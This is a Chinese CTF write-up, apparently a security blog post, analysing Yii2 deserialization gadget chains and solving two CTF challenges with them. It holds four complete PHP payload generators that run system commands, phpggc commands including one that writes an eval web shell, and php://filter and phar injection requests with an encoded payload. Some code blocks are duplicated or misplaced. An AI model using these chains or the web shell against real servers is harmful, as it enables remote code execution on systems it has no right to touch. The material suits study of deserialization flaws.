通过几道CTF题学习yii2框架

1337163122

通过几道CTF题学习yii2框架原创 larry 合天网安实验室 今天
​
原创稿件征集

邮箱：edu@antvsion.com
QQ：3200599554
黑客与极客相关，互联网安全领域里
的热点话题
漏洞、技术相关的调查或分析
稿件通过并发布还能收获
200-800元不等的稿酬
简介Yii是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架，Yii2 2.0.38 之前的版本存在反序列化漏洞，程序在调用unserialize()时，攻击者可通过构造特定的恶意请求执行任意命令，本篇就分析一下yii2利用链以及如何自己去构造payload，并结合CTF题目去学习yii2框架
Yii2＜2.0.38反序列化安装：在 https://github.com/yiisoft/yii2/releases 下载2.0.37的版本
然后在 yii-basic-app-2.0.37\basic\config\web.php里面往cookieValidationKey随意给点值，运行 php yii serve，新建一个控制器

• 
  

yii-basic-app-2.0.37\basic\controllers\TestController.php

1. <?php
   
2. namespace app\controllers;
   
3. use yii\web\Controller;
   
4. 
   
5. class TestController extends Controller{
   
6.     public function actionTest($name){
   
7.         return unserialize($name);
   
8.     }
   
9. }

复制代码

就可以进行测试了

• 1. public function reset()
     
  2. {
     
  3.         if ($this->_dataReader !== null) {
     
  4.             $this->_dataReader->close();
     
  5.         }

  复制代码
  
  

?r=test/test&name=
链一链的入口在

• 
  

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\db\BatchQueryResult.php

1. public function __destruct()
   
2. {
   
3.         // make sure cursor is closed
   
4.         $this->reset();
   
5.     }

复制代码

跟进$this->reset();

1. public function reset()
   
2. {
   
3.         if ($this->_dataReader !== null) {
   
4.             $this->_dataReader->close();
   
5.         }

复制代码

这里的$this->_dataReader可控，并调用了close()方法，那么可以找到一个类不存在close()方法，但存在__call方法就可以调用他了
在yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2-gii\src\Generator.php

1. public function __call($method, $attributes)
   
2. {
   
3.         return $this->format($method, $attributes);
   
4.     }

复制代码

这里的$method为close，$attributes为空，继续跟进format

1. public function format($formatter, $arguments = array())
   
2. {
   
3.         return call_user_func_array($this->getFormatter($formatter), $arguments);
   
4.     }

复制代码

跟进getFormatter

1. public function getFormatter($formatter)
   
2. {
   
3.         if (isset($this->formatters[$formatter])) {
   
4.             return $this->formatters[$formatter];
   
5.         }

复制代码

似曾相识的代码，laravel5.8某条链就出现过，这里$this->formatters可控，也就是$this->getFormatter($formatter)这这个可控，但是$arguments的值我们无法控制，值为空
到这里可以执行phpinfo了

1. <?php
   
2. namespace yii\db{
   
3. class BatchQueryResult{
   
4.   private $_dataReader;
   
5.   public function __construct($_dataReader) {
   
6.    $this->_dataReader = $_dataReader;
   
7.   }
   
8. }
   
9. }
   
10. namespace Faker{
    
11. class Generator{
    
12.   protected $formatters = array();
    
13.   public function __construct($formatters) {
    
14.    $this->formatters = $formatters;
    
15.   }
    
16. }
    
17. }
    
18. namespace {
    
19. $a = new Faker\Generator(array('close'=>'phpinfo'));
    
20. $b = new yii\db\BatchQueryResult($a);
    
21. print(urlencode(serialize($b)));
    
22. }

复制代码

但是我们想要rce的话，还要在yii2中已有的无参方法中进行挖掘

这里我们可以使用正则匹配直接搜索含有call_user_function的无参函数
​
call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)
​然后找到下面两个都比较好用

1. yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\IndexAction.php
   
2. public function run()
   
3. {
   
4.         if ($this->checkAccess) {
   
5.             call_user_func($this->checkAccess, $this->id);
   
6.         }
   
7. 
   
8.         return $this->prepareDataProvider();
   
9.     }
   
10. 
    
11. yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\CreateAction.php
    
12. public function run()
    
13. {
    
14.     if ($this->checkAccess) {
    
15.         call_user_func($this->checkAccess, $this->id);
    
16. }

复制代码

这里的$this->checkAccess和$this->id都是我们可控的
所以直接构造就行了

1. <?php
   
2. namespace yii\db{
   
3. class BatchQueryResult{
   
4.   private $_dataReader;
   
5.   public function __construct($_dataReader) {
   
6.    $this->_dataReader = $_dataReader;
   
7.   }
   
8. }
   
9. }
   
10. namespace Faker{
    
11. class Generator{
    
12.   protected $formatters = array();
    
13.   public function __construct($formatters) {
    
14.    $this->formatters = $formatters;
    
15.   }
    
16. }
    
17. }
    
18. namespace yii\rest{
    
19. class CreateAction{
    
20.   public $checkAccess;
    
21.         public $id;
    
22.         public function __construct($checkAccess,$id){
    
23.             $this->checkAccess = $checkAccess;
    
24.             $this->id = $id;
    
25.   }
    
26. }
    
27. }
    
28. namespace {
    
29. $c = new yii\rest\CreateAction('system','whoami');
    
30. $b = new Faker\Generator(array('close'=>array($c, 'run')));
    
31. $a = new yii\db\BatchQueryResult($b);
    
32. print(urlencode(serialize($a)));
    
33. }

复制代码

链二这个是yii2 2.0.37的另外一条链
起点和链一相同，是BatchQueryResult类的__destruct，然后是$this->_dataReader->close()，但是这里不找__call，我们去找存在close方法的类

找到yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\web\DbSession.php

1. class DbSession extends MultiFieldSession
   
2. {
   
3. ...
   
4. public function close()
   
5. {
   
6.         if ($this->getIsActive()) {
   
7.             // prepare writeCallback fields before session closes
   
8.             $this->fields = $this->composeFields();

复制代码

这里跟进$this->composeFields()

1. abstract class MultiFieldSession extends Session
   
2. {
   
3. protected function composeFields($id = null, $data = null)
   
4. {
   
5.         $fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : [];

复制代码

这里$this->writeCallback可控，$this是一个对象，所以这里调phpinfo的话应该不行，不过可以续上链一的run方法（即那个无参的方法）

这里直接构造即可

1. <?php
   
2. namespace yii\db{
   
3.     class BatchQueryResult{
   
4.         private $_dataReader;
   
5.         public function __construct($_dataReader) {
   
6.             $this->_dataReader = $_dataReader;
   
7.         }
   
8.     }
   
9. }
   
10. namespace yii\web{
    
11.     class DbSession{
    
12.         public $writeCallback;
    
13.         public function __construct($writeCallback) {
    
14.             $this->writeCallback = $writeCallback;
    
15.         }
    
16.     }
    
17. }
    
18. namespace yii\rest{
    
19.     class CreateAction{
    
20.         public $checkAccess;
    
21.         public $id;
    
22.         public function __construct($checkAccess,$id){
    
23.             $this->checkAccess = $checkAccess;
    
24.             $this->id = $id;
    
25.         }
    
26.     }
    
27. }
    
28. namespace {
    
29.     $c = new yii\rest\CreateAction('system','whoami');
    
30.     $b = new yii\web\DbSession(array($c, 'run'));
    
31.     $a = new yii\db\BatchQueryResult($b);
    
32.     print(urlencode(serialize($a)));
    
33. }

复制代码

链三我们可以在yii2 2.0.38的commit看到他加了一个__wakeup
​
这里限制了链一的起点BatchQueryResult无法使用，后面的__call的链没有被破坏，所以我们继续寻找一个__destruct

• 
  

yii-basic-app-2.0.37\basic\vendor\codeception\codeception\ext\RunProcess.php

1. public function __destruct()
   
2. {
   
3.         $this->stopProcess();
   
4.     }

复制代码

这里继续跟进stopProcess

1. public function stopProcess()
   
2. {
   
3.         foreach (array_reverse($this->processes) as $process) {
   
4.             /** @var $process Process  **/
   
5.             if (!$process->isRunning()) {
   
6.                 continue;
   
7.             }

复制代码

这里的$this->processes可控，所以可以利用$process->isRunning()来进行触发__call
后面的利用就和链一相同了

1. <?php
   
2. namespace Codeception\Extension{
   
3. class RunProcess{
   
4.   private $processes = [];
   
5.   public function __construct($processes) {
   
6.    $this->processes[] = $processes;
   
7.   }
   
8. }
   
9. }
   
10. namespace Faker{
    
11. class Generator{
    
12.   protected $formatters = array();
    
13.   public function __construct($formatters) {
    
14.    $this->formatters = $formatters;
    
15.   }
    
16. }
    
17. }
    
18. namespace yii\rest{
    
19. class CreateAction{
    
20.   public $checkAccess;
    
21.         public $id;
    
22.         public function __construct($checkAccess,$id){
    
23.             $this->checkAccess = $checkAccess;
    
24.             $this->id = $id;
    
25.   }
    
26. }
    
27. }
    
28. namespace {
    
29. $c = new yii\rest\CreateAction('system','whoami');
    
30. $b = new Faker\Generator(array('isRunning'=>array($c, 'run')));
    
31. $a = new Codeception\Extension\RunProcess($b);
    
32. print(urlencode(serialize($a)));
    
33. }

复制代码

链四同样的先找__destruct

• 
  

yii-basic-app-2.0.37\basic\vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php

1. public function __destruct()
   
2. {
   
3.         foreach ($this->keys as $nsKey => $null) {
   
4.             $this->clearAll($nsKey);
   
5.         }
   
6.     }

复制代码

这里$nsKey可控，跟进clearAll

1. public function clearAll($nsKey)
   
2. {
   
3.         if (array_key_exists($nsKey, $this->keys)) {
   
4.             foreach ($this->keys[$nsKey] as $itemKey => $null) {
   
5.                 $this->clearKey($nsKey, $itemKey);
   
6.             }
   
7.             if (is_dir($this->path.'/'.$nsKey)) {
   
8.                 rmdir($this->path.'/'.$nsKey);
   
9.             }
   
10.             unset($this->keys[$nsKey]);
    
11.         }
    
12.     }

复制代码

这里没有触发__call的地方，但是存在字符串的拼接，可以触发__toString
随便找找就找到了

• 
  

yii-basic-app-2.0.37\basic\vendor\codeception\codeception\src\Codeception\Util\XmlBuilder.php

1. <code>public function __toString()</code><code>{</code><code>    return $this->__dom__->saveXML();</code><code>}</code>

复制代码

同样用他去触发__cal

1. <?php
   
2. namespace {
   
3.     class Swift_KeyCache_DiskKeyCache{
   
4.         private $path;
   
5.         private $keys = [];
   
6.         public function __construct($path,$keys) {
   
7.             $this->path = $path;
   
8.             $this->keys = $keys;
   
9.         }
   
10.     }
    
11. }
    
12. namespace Codeception\Util{
    
13.     class XmlBuilder{
    
14.         protected $__dom__;
    
15.         public function __construct($__dom__) {
    
16.             $this->__dom__ = $__dom__;
    
17.         }
    
18.     }
    
19. }
    
20. namespace Faker{
    
21.     class Generator{
    
22.         protected $formatters = array();
    
23.         public function __construct($formatters) {
    
24.             $this->formatters = $formatters;
    
25.         }
    
26.     }
    
27. }
    
28. namespace yii\rest{
    
29.     class CreateAction{
    
30.         public $checkAccess;
    
31.         public $id;
    
32.         public function __construct($checkAccess,$id){
    
33.             $this->checkAccess = $checkAccess;
    
34.             $this->id = $id;
    
35.         }
    
36.     }
    
37. }
    
38. namespace {
    
39.     $c = new yii\rest\CreateAction('system','whoami');
    
40.     $b = new Faker\Generator(array('saveXML'=>array($c,'run')));
    
41.     $a = new Codeception\Util\XmlBuilder($b);
    
42.     $d = new Swift_KeyCache_DiskKeyCache($a,array('kawhi'=>'kawhi'));
    
43.     print(urlencode(serialize($d)));
    
44. }

复制代码

​
phpggc使用./phpggc -l yii2可以看到有两条yii2的链
​
可以使用如下命令快速得到链，-u指url编码

• 
  

./phpggc Yii2/RCE1 system id -u
phpggc的链二的终点是一个eval，所以这里可以直接写shell，-b指base64编码

• 
  

./phpggc Yii2/RCE2 'file_put_contents("shell.php",base64_decode("D9waHAgZXZhbCgkX1BPU1RbMV0pPz4="));' -b
CTF题目[HMBCTF 2021]framework把题目附件解压，看到html\controllers\SiteController.php

• 
  

1. class SiteController extends Controller
   
2. {
   
3.     public function actionAbout($message = 'Hello')
   
4. {
   
5.         $data = base64_decode($message);
   
6.         unserialize($data);
   
7.     }

复制代码

这里可以这样传参

• 
  

?r=site/about&message=
拿链一打了一下，发现一下system等函数被ban
这里用phpggc yii2的链二写一个shell进去，然后用蚁剑的 apache/mod 绕 disable，运行 /readflag 即可获取 flag
​
[CISCN2021 Quals]filter据说这是配置文件里面的重要内容，或许对你有用！！

1. 'log' => [
   
2.             'traceLevel' => YII_DEBUG ? 0 : 0,
   
3.             'targets' => [
   
4.                 [
   
5.                     'class' => 'yii\log\FileTarget',
   
6.                     'levels' => ['error'],
   
7.                     'logVars' => [],
   
8.                 ],
   
9.             ],
   
10.         ],

复制代码

看到附件的SiteController.php就改了这个地方

1. public function actionIndex()<div class="blockcode"><blockquote>"require": {
   
2.         "php": ">=5.6.0",
   
3.         "yiisoft/yii2": "~2.0.14",
   
4.         "yiisoft/yii2-bootstrap": "~2.0.0",
   
5.         "yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0",
   
6. "monolog/monolog":"1.19"
   
7.     },

复制代码

{
        $file = Yii:app->request->get('file');
        $res = file_get_contents($file);
        file_put_contents($file,$res);
        return $this->render('index');
    }
yii框架的runtime/logs目录下有一个app.log

看一下依赖发现monolog符合

1. "require": {
   
2.         "php": ">=5.6.0",
   
3.         "yiisoft/yii2": "~2.0.14",
   
4.         "yiisoft/yii2-bootstrap": "~2.0.0",
   
5.         "yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0",
   
6. "monolog/monolog":"1.19"
   
7.     },

复制代码

首先清空日志文件

• 
  

?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
phpggc生成

• 
  

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "phpinfo" "1" --phar phar -o php://output |base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"
写入日志，注意最后面要加个字符a

• 
  

/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4A=00=41=00=61=00=47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a
保留phar的内容

• 
  

/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
最后用phar协议打一下

• 
  

/?file=phar://../runtime/logs/app.log/test.txt
​​
然后在根目录找到This_is_flaaagggg
然后用这个找一下flag即可

• 
  

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"
实操推荐PHP反序列化漏洞：（复制链接体验）
https://www.hetianlab.com/expc.d ... =weixin-wemedia#stu
通过本次实验，大家将会明白什么是反序列化漏洞，反序列化漏洞的成因以及如何挖掘和预防此类漏洞。